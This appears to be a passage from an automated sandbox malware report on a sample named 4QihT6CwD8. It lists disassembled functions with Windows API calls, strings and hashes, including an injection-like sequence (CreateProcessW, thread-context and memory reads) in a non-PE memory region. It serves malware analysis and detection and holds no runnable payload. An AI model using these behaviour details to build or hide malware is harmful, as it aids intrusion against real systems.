                                  control_flow_graph 1907 385aa9-385ace 1908 385ad0-385ad2 1907->1908 1909 385ad7-385ad9 1907->1909 1910 385ca5-385cb4 call 370a8c 1908->1910 1911 385afa-385b1f 1909->1911 1912 385adb-385af5 call 37f2c6 call 37f2d9 call 3827ec 1909->1912 1914 385b21-385b24 1911->1914 1915 385b26-385b2c 1911->1915 1912->1910 1914->1915 1918 385b4e-385b53 1914->1918 1919 385b4b 1915->1919 1920 385b2e-385b46 call 37f2c6 call 37f2d9 call 3827ec 1915->1920 1923 385b64-385b6d call 38564e 1918->1923 1924 385b55-385b61 call 389424 1918->1924 1919->1918 1952 385c9c-385c9f 1920->1952 1935 385ba8-385bba 1923->1935 1936 385b6f-385b71 1923->1936 1924->1923 1938 385bbc-385bc2 1935->1938 1939 385c02-385c23 WriteFile 1935->1939 1940 385b73-385b78 1936->1940 1941 385b95-385b9e call 38542e 1936->1941 1943 385bf2-385c00 call 3856c4 1938->1943 1944 385bc4-385bc7 1938->1944 1947 385c2e 1939->1947 1948 385c25-385c2b GetLastError 1939->1948 1945 385c6c-385c7e 1940->1945 1946 385b7e-385b8b call 3855e1 1940->1946 1951 385ba3-385ba6 1941->1951 1943->1951 1954 385bc9-385bcc 1944->1954 1955 385be2-385bf0 call 385891 1944->1955 1958 385c89-385c99 call 37f2d9 call 37f2c6 1945->1958 1959 385c80-385c83 1945->1959 1960 385b8e-385b90 1946->1960 1953 385c31-385c3c 1947->1953 1948->1947 1951->1960 1965 385ca4 1952->1965 1962 385c3e-385c43 1953->1962 1963 385ca1 1953->1963 1954->1945 1964 385bd2-385be0 call 3857a3 1954->1964 1955->1951 1958->1952 1959->1958 1969 385c85-385c87 1959->1969 1960->1953 1971 385c69 1962->1971 1972 385c45-385c4a 1962->1972 1963->1965 1964->1951 1965->1910 1969->1965 1971->1945 1976 385c4c-385c5e call 37f2d9 call 37f2c6 1972->1976 1977 385c60-385c67 call 37f2a3 1972->1977 1976->1952 1977->1952
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: JO5
                                  • API String ID: 0-2736670445
                                  • Opcode ID: 3fa6bfcd3182a9b972530ddd8aafba7860c2b97ee79c7697c0baa71b0f82580e
                                  • Instruction ID: bc39896d2389e3a8e3a082da554fbabbbb5ceac863599c81753fcde40fd77a1d
                                  • Opcode Fuzzy Hash: 3fa6bfcd3182a9b972530ddd8aafba7860c2b97ee79c7697c0baa71b0f82580e
                                  • Instruction Fuzzy Hash: 05519E75A007099FCF23BFA4C945BAE7BB8AF15310F250099F405AB292D7759A01CB61
                                  Function 00353B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00353B0F,SwapMouseButtons,00000004,?), ref: 00353B40
                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00353B0F,SwapMouseButtons,00000004,?), ref: 00353B61
                                  • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00353B0F,SwapMouseButtons,00000004,?), ref: 00353B83
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: Control Panel\Mouse
                                  • API String ID: 3677997916-824357125
                                  • Opcode ID: 4a3e8d2c366c497ebbcce32d889b507687a9ca8ff4bc5e412e09c27dfbe0cc95
                                  • Instruction ID: 601e5e8df176ce375dd326d43d52c44b4254e78f47e5b69d7ef985bf06a11930
                                  • Opcode Fuzzy Hash: 4a3e8d2c366c497ebbcce32d889b507687a9ca8ff4bc5e412e09c27dfbe0cc95
                                  • Instruction Fuzzy Hash: B71118B5520218FEDB228FA5DC84EAEB7BCEF04785B114559E805D7120D2319E459760
                                  Function 011412A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 01141A5B
                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01141AF1
                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01141B13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674676334.0000000001140000.00000040.00001000.00020000.00000000.sdmp, Offset: 01140000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1140000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                  • String ID:
                                  • API String ID: 2438371351-0
                                  • Opcode ID: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                  • Instruction ID: eb53b717dcc53001957e4076a5a7ce8d3f08b6b76fa60de46ab9bbfd219a74b5
                                  • Opcode Fuzzy Hash: e8e7a77c1c38f92167ec50984bffac71589908538948dc0fdf133907e09ee162
                                  • Instruction Fuzzy Hash: 7C621B74A14258DBEB28CFA4C850BDEB772EF58700F1091A9D20DEB390E7759E81CB59
                                  Function 00353923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003933A2
                                    • Part of subcall function 00356B57: _wcslen.LIBCMT ref: 00356B6A
                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00353A04
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: IconLoadNotifyShell_String_wcslen
                                  • String ID: Line:
                                  • API String ID: 2289894680-1585850449
                                  • Opcode ID: ab8584611099ca6964a58d5ed11a25bb2b5663cda964a50dfbb3d6a719ca3743
                                  • Instruction ID: 247970631d15840c2a9125656ecde8b699a16ad0068ed0db1c8d697e59fafa1f
                                  • Opcode Fuzzy Hash: ab8584611099ca6964a58d5ed11a25bb2b5663cda964a50dfbb3d6a719ca3743
                                  • Instruction Fuzzy Hash: 6D31E2B1508304AAD723EB20DC46FEBB7E8AB50351F50492AF999870B1DB749A4DC7C6
                                  Function 00352DE3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetOpenFileNameW.COMDLG32(?), ref: 00392C8C
                                    • Part of subcall function 00353AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00353A97,?,?,00352E7F,?,?,?,00000000), ref: 00353AC2
                                    • Part of subcall function 00352DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00352DC4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Name$Path$FileFullLongOpen
                                  • String ID: X$`eA
                                  • API String ID: 779396738-2962714298
                                  • Opcode ID: c5f2b6b6f2be9e59af92e992aed46ad5e7076d994ca6b131452a7478f6d7487e
                                  • Instruction ID: cf72144f67d0a7dfe80da0907b60800cfa90dbe4757bd4b7293cdcc7a2ab972f
                                  • Opcode Fuzzy Hash: c5f2b6b6f2be9e59af92e992aed46ad5e7076d994ca6b131452a7478f6d7487e
                                  • Instruction Fuzzy Hash: 5D219671A00298AFDF02DF94C845BEE7BFD9F49315F00805AE805AB251DBB8998DCF65
                                  Function 0036FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                  Download Yara Rule
                                  APIs
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00370668
                                    • Part of subcall function 003732A4: RaiseException.KERNEL32(?,?,?,0037068A,?,00421444,?,?,?,?,?,?,0037068A,00351129,00418738,00351129), ref: 00373304
                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00370685
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Exception@8Throw$ExceptionRaise
                                  • String ID: Unknown exception
                                  • API String ID: 3476068407-410509341
                                  • Opcode ID: f70d748df0867a2588a8516747465c6acc9136a1cd4f1ec1c8ce99b753025877
                                  • Instruction ID: 7c35b5c820d444a65e857fe53cea7848870c1e1794440e75034ba23ec8d112d6
                                  • Opcode Fuzzy Hash: f70d748df0867a2588a8516747465c6acc9136a1cd4f1ec1c8ce99b753025877
                                  • Instruction Fuzzy Hash: 29F0283490020DF7CB26B664EC96D9E776C9E40310B60C535B82C895D6EF79EA65C580
                                  Function 003C3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 003C302F
                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 003C3044
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Temp$FileNamePath
                                  • String ID: aut
                                  • API String ID: 3285503233-3010740371
                                  • Opcode ID: 50b9dad2e531d82d08f62a4ac5bf25c73000d1e67425164f1c65afb53cb4e0de
                                  • Instruction ID: 006df3cbb3bd6a65b71b08010bc7617726a134c0d3648ea45de190433a50f3a9
                                  • Opcode Fuzzy Hash: 50b9dad2e531d82d08f62a4ac5bf25c73000d1e67425164f1c65afb53cb4e0de
                                  • Instruction Fuzzy Hash: 0FD05E7294032867DE30A7A4AC4EFCB3A6CEB05751F0006A2BB55E60D1DBB4D985CAD0
                                  Function 003D7F59 Relevance: 4.9, APIs: 3, Instructions: 430COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 003D82F5
                                  • TerminateProcess.KERNEL32(00000000), ref: 003D82FC
                                  • FreeLibrary.KERNEL32(?,?,?,?), ref: 003D84DD
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Process$CurrentFreeLibraryTerminate
                                  • String ID:
                                  • API String ID: 146820519-0
                                  • Opcode ID: e0bc7e274949b4083e0191579c54c2760fe6f42c50a406a18f557800f736166c
                                  • Instruction ID: ad4b480d339098b7c161b6954c12aa45b1fc52c8581378a6d4256b3b117df8bf
                                  • Opcode Fuzzy Hash: e0bc7e274949b4083e0191579c54c2760fe6f42c50a406a18f557800f736166c
                                  • Instruction Fuzzy Hash: 32126A719083419FC725DF28D484B2ABBE5BF85318F05895EE8898B352DB31ED45CB92
                                  Function 003510F3 Relevance: 4.7, APIs: 3, Instructions: 153comCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00351BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00351BF4
                                    • Part of subcall function 00351BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00351BFC
                                    • Part of subcall function 00351BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00351C07
                                    • Part of subcall function 00351BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00351C12
                                    • Part of subcall function 00351BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00351C1A
                                    • Part of subcall function 00351BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00351C22
                                    • Part of subcall function 00351B4A: RegisterWindowMessageW.USER32(00000004,?,003512C4), ref: 00351BA2
                                  • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0035136A
                                  • OleInitialize.OLE32 ref: 00351388
                                  • CloseHandle.KERNEL32(00000000,00000000), ref: 003924AB
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                  • String ID:
                                  • API String ID: 1986988660-0
                                  • Opcode ID: b0803364bed056a69e858ba5c7ee9beea5c553a9b66b00574a18ed8537f7b377
                                  • Instruction ID: 6169026504fea5786be6a8409928013190116d40553404d27d2e4577b057b8a8
                                  • Opcode Fuzzy Hash: b0803364bed056a69e858ba5c7ee9beea5c553a9b66b00574a18ed8537f7b377
                                  • Instruction Fuzzy Hash: FB71B5B4B11254AFC7A5EF79AC85A553AE0BBA83447D482BAD40AC7371EB344487CF4C
                                  Function 003BC161 Relevance: 4.6, APIs: 3, Instructions: 74timewindowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00353923: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00353A04
                                  • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 003BC259
                                  • KillTimer.USER32(?,00000001,?,?), ref: 003BC261
                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 003BC270
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: IconNotifyShell_Timer$Kill
                                  • String ID:
                                  • API String ID: 3500052701-0
                                  • Opcode ID: 25b3b4d027942881b1f8042373901bd0f2428f19dd3145a53e7f607578b39882
                                  • Instruction ID: b7bade8dc4a05dfbfbc63240004b4ba059d51d944a6e8edb6f7f30728af084bd
                                  • Opcode Fuzzy Hash: 25b3b4d027942881b1f8042373901bd0f2428f19dd3145a53e7f607578b39882
                                  • Instruction Fuzzy Hash: 8031C870914344AFEF33CF648895BEBBBEC9B06308F001499D6D99B542C3745A85CB51
                                  Function 003886AE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,003885CC,?,00418CC8,0000000C), ref: 00388704
                                  • GetLastError.KERNEL32(?,003885CC,?,00418CC8,0000000C), ref: 0038870E
                                  • __dosmaperr.LIBCMT ref: 00388739
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                  • String ID:
                                  • API String ID: 490808831-0
                                  • Opcode ID: 9ae856d5a7b7881960224046667f5201255e7591a7284f5878854ef0a57f7fed
                                  • Instruction ID: 528f5fc85cf375a86a13776f43dcbd762b67226d71094d8468db29983e8cd3c7
                                  • Opcode Fuzzy Hash: 9ae856d5a7b7881960224046667f5201255e7591a7284f5878854ef0a57f7fed
                                  • Instruction Fuzzy Hash: 79016B3A70436016C6337334684577E27594B81774F7A02D9F9148F0D3EEE49C81C350
                                  Function 0035DB38 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • TranslateMessage.USER32(?), ref: 0035DB7B
                                  • DispatchMessageW.USER32(?), ref: 0035DB89
                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0035DB9F
                                  • Sleep.KERNEL32(0000000A), ref: 0035DBB1
                                  • TranslateAcceleratorW.USER32(?,?,?), ref: 003A1CC9
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                  • String ID:
                                  • API String ID: 3288985973-0
                                  • Opcode ID: a6c424da7bdb0ebf3a9183cbfec4bfe4a1e008d51243a60f5856991c251a4053
                                  • Instruction ID: 40ccfd91649589300d3bbd637a3ad1d23c94ccb54c2abed8d1fc609fc83ee0bf
                                  • Opcode Fuzzy Hash: a6c424da7bdb0ebf3a9183cbfec4bfe4a1e008d51243a60f5856991c251a4053
                                  • Instruction Fuzzy Hash: 4EF05E306143809BEB31DBA08C89FEA73ADEB45311F504629EA4AC70E0DB3094898B15
                                  Function 003C2FD8 Relevance: 4.5, APIs: 3, Instructions: 27filetimeCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,003C2CD4,?,?,?,00000004,00000001), ref: 003C2FF2
                                  • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003C2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003C3006
                                  • CloseHandle.KERNEL32(00000000,?,003C2CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 003C300D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1674270892.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                  • Associated: 00000000.00000002.1674254236.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.00000000003EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674326141.0000000000412000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674386464.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1674405370.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_350000_4QihT6CwD8.jbxd
                                  Similarity
                                  • API ID: File$CloseCreateHandleTime
                                  • String ID:
                                  • API String ID: 3397143404-0
                                  • Opcode ID: b572ad1742cdb74a72f982c5e01e1c12b6326059207a5d46f9eded63ce0268ef
                                  • Instruction ID: 704c7c9b20d2e53dd34cfb2c0ffcd6586ca3568d62cb1536894dcf7a62182f7f
                                  • Opcode Fuzzy Hash: b572ad1742cdb74a72f982c5e01e1c12b6326059207a5d46f9eded63ce0268ef
                                  • Instruction Fuzzy Hash: 4CE0863629026477D2321755BC4DF8F3E1CDB86B71F114314FB19B90D146A1190243A8
                                  Function 00361310 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 531COMMON
                                  Download Yara Rule
                                  APIs
                                  • __Init_thread_footer.LIBCMT ref: 003617F6
                                  Strings
                                  Memory Dump Source
